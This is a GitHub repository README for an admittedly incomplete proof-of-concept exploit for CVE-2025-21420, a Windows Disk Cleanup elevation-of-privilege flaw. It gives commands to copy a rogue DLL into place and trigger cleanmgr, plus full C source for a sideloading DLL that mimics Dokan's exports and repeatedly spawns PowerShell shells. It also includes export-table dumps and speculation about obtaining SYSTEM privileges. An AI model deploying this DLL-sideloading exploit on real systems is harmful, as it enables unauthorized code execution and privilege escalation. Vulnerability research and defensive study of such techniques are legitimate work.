rkruso/CVE-2025-21420-PoC

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 

Repository files navigation

CVE-2025-21420 PoC

(Windows Disk Cleanup Tool Elevation of Privilege Vulnerability)

As far as we know this is the first, albeit incomplete, PoC for this CVE. At the moment there is no public information about the CVE, so we do not know whether we discovered something new or only part of the exploit.

We found a way to DLL sideload with cleanmgr.exe

$ cp .\dokan1.dll C:\Users\<username>\System32\System32\System32\dokannp1.dll
$ cleanmgr /sageset:2

Just use regular DLL Sideloading and it will rain shellz. We have not yet tested whether the second DLL name alone is sufficient, or whether the first, slightly different one is also used (we may have misread the names on first look in ProcMon due to the small font size).

Currently still working on the PrivEsc part, but it's very likely just scheduling cleanmgr.exe for NT-Authority\System or waiting till it's triggered by the system, e.g. by Filling a Disk or creating too many temp files.

Warning: the following is still research-level code (meaning, total crap code); it will pop hundreds of message boxes and shells. The same can be done with much less code.

#include <stdio.h>
#include "pch.h"
#include <stdlib.h>
#include <windows.h>


/* Exported names mirroring the export table of the genuine dokan1.dll (see the
 * dumpbin listing below), so that a loader resolving these symbols by name
 * succeeds. Every one of these is defined further down as a stub that forwards
 * to DokanMain(); none of them implements the real Dokan function or matches
 * its real signature. */
__declspec(dllexport) void DokanDebugMode();
__declspec(dllexport) void DokanDriverVersion();
__declspec(dllexport) void DokanGetMountPointList();
__declspec(dllexport) void DokanIsNameInExpression();
__declspec(dllexport) void DokanMain();
__declspec(dllexport) void DokanMapKernelToUserCreateFileFlags();
__declspec(dllexport) void DokanNetworkProviderInstall();
__declspec(dllexport) void DokanNetworkProviderUninstall();
__declspec(dllexport) void DokanNotifyCreate();
__declspec(dllexport) void DokanNotifyDelete();
__declspec(dllexport) void DokanNotifyRename();
__declspec(dllexport) void DokanNotifyUpdate();
__declspec(dllexport) void DokanNotifyXAttrUpdate();
__declspec(dllexport) void DokanNtStatusFromWin32();
__declspec(dllexport) void DokanOpenRequestorToken();
__declspec(dllexport) void DokanReleaseMountPointList();
__declspec(dllexport) void DokanRemoveMountPoint();
__declspec(dllexport) void DokanResetTimeout();
__declspec(dllexport) void DokanServiceDelete();
__declspec(dllexport) void DokanServiceInstall();
__declspec(dllexport) void DokanSetDebugMode();
__declspec(dllexport) void DokanUnmount();
__declspec(dllexport) void DokanUseStdErr();
__declspec(dllexport) void DokanVersion();

/* DLL entry point.
 *
 * In the original switch every reason code (DLL_PROCESS_ATTACH,
 * DLL_THREAD_ATTACH, DLL_THREAD_DETACH, DLL_PROCESS_DETACH and anything else)
 * fell through to the same DokanMain() call, so the dispatch is written here
 * as one unconditional call. The parameters are unused.
 *
 * Note for reviewers: DllMain runs under the loader lock, and DokanMain()
 * shows a message box, spawns a shell and creates a thread from there, which
 * is the kind of work the DllMain contract discourages. Always returns TRUE.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)ul_reason_for_call;
    (void)lpReserved;

    DokanMain();
    return TRUE;
}

/* Payload body shared by every entry point of this DLL.
 *
 * Reached from DllMain() on every notification reason and from every exported
 * stub below, and re-entered through the thread it starts at the end, so one
 * load of the DLL produces an unbounded number of message boxes and shells
 * (this is the behaviour the README's warning refers to).
 */
void DokanMain() {
    /* Modal message box: blocks the calling thread until it is dismissed. */
    MessageBoxW(NULL, L"Hello World2", L"DLL Message", MB_OK);
    /* Synchronous: blocks until the spawned shell exits. */
    system("powershell.exe");
    HANDLE hThread = NULL;

    /* cmdLine, si and pi look like the setup for a CreateProcessW call that is
     * never made in this revision; they are dead code. */
    wchar_t cmdLine[] = L"powershell.exe"; 
    STARTUPINFOW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };

    si.cb = sizeof(si);

    /* DokanDebugMode() is one of the stubs that simply calls DokanMain() again,
     * so this thread recurses into this function. The cast papers over the fact
     * that DokanDebugMode() does not have the LPTHREAD_START_ROUTINE signature
     * (no parameter, no DWORD return). The returned handle is never closed and
     * the call's result is never checked. */
    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)DokanDebugMode, NULL, 0, NULL);
    return;
}

/* Export stub: forwards to DokanMain(). */
void DokanDebugMode(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanDriverVersion(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanGetMountPointList(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanIsNameInExpression(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanMapKernelToUserCreateFileFlags(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanNetworkProviderInstall(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanNetworkProviderUninstall(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanNotifyCreate(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanNotifyDelete(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanNotifyRename(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanNotifyUpdate(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanNotifyXAttrUpdate(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanNtStatusFromWin32(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanOpenRequestorToken(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanReleaseMountPointList(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanRemoveMountPoint(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanResetTimeout(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanServiceDelete(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanServiceInstall(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanSetDebugMode(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanUnmount(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanUseStdErr(void)
{
    DokanMain();
}
/* Export stub: forwards to DokanMain(). */
void DokanVersion(void)
{
    DokanMain();
}

Some Background

CVE-2025-21420-DLL-Sideloading

$ dumpbin /exports C:\Windows\System32\dokan1.dll
Microsoft (R) COFF/PE Dumper Version 14.34.31937.0
Copyright (C) Microsoft Corporation.  All rights reserved.


Dump of file C:\Windows\System32\dokan1.dll

File Type: DLL


    ordinal hint RVA      name

          1    0 00004E40 DokanDebugMode
          2    1 0000F760 DokanDriverVersion
          3    2 00006F00 DokanGetMountPointList
          4    3 000045F0 DokanIsNameInExpression
          5    4 000052E0 DokanMain
          6    5 00007230 DokanMapKernelToUserCreateFileFlags
          7    6 000098F0 DokanNetworkProviderInstall
          8    7 00009B70 DokanNetworkProviderUninstall
          9    8 00007530 DokanNotifyCreate
         10    9 00007550 DokanNotifyDelete
         11    A 00007590 DokanNotifyRename
         12    B 00007570 DokanNotifyUpdate
         13    C 00007580 DokanNotifyXAttrUpdate
         14    D 0000AB80 DokanNtStatusFromWin32
         15    E 00001340 DokanOpenRequestorToken
         16    F 00007160 DokanReleaseMountPointList
         17   10 0000A9F0 DokanRemoveMountPoint
         18   11 0000F430 DokanResetTimeout
         19   12 00009790 DokanServiceDelete
         20   13 00009650 DokanServiceInstall
         21   14 00006BE0 DokanSetDebugMode
         22   15 00009870 DokanUnmount
         23   16 00004E30 DokanUseStdErr
         24   17 0000F750 DokanVersion

  Summary
        6000 .pdata
       15000 .rdata
        1000 .reloc
        1000 .rsrc
       60000 .text
        1000 _RDATA

Comparing the two export tables, it is clear that not all of the function names are needed.

$ dumpbin /exports C:\Windows\System32\dokannp1.dll
Microsoft (R) COFF/PE Dumper Version 14.34.31937.0
Copyright (C) Microsoft Corporation.  All rights reserved.



Dump of file C:\Windows\System32\dokannp1.dll

File Type: DLL

  Section contains the following exports for dokannp1.dll

    00000000 characteristics
    FFFFFFFF time date stamp
        0.00 version
          12 ordinal base
         490 number of functions
          13 number of names

    ordinal hint RVA      name

         17    0 00001720 NPAddConnection
         38    1 00001810 NPAddConnection3
         18    2 000018F0 NPCancelConnection
         35    3 00001E80 NPCloseEnum
         34    4 00002140 NPEnumResource
         13    5 000014B0 NPGetCaps
         12    6 00001A50 NPGetConnection
         52    7 00002780 NPGetResourceInformation
         41    8 00001ED0 NPGetResourceParent
         40    9 00002C70 NPGetUniversalName
        500    A 000016C0 NPLogonNotify
         33    B 00001BF0 NPOpenEnum
        501    C 000016F0 NPPasswordChangeNotify

  Summary

        3000 .data
        5000 .pdata
       14000 .rdata
        1000 .reloc
        1000 .rsrc
       50000 .text
        1000 _RDATA
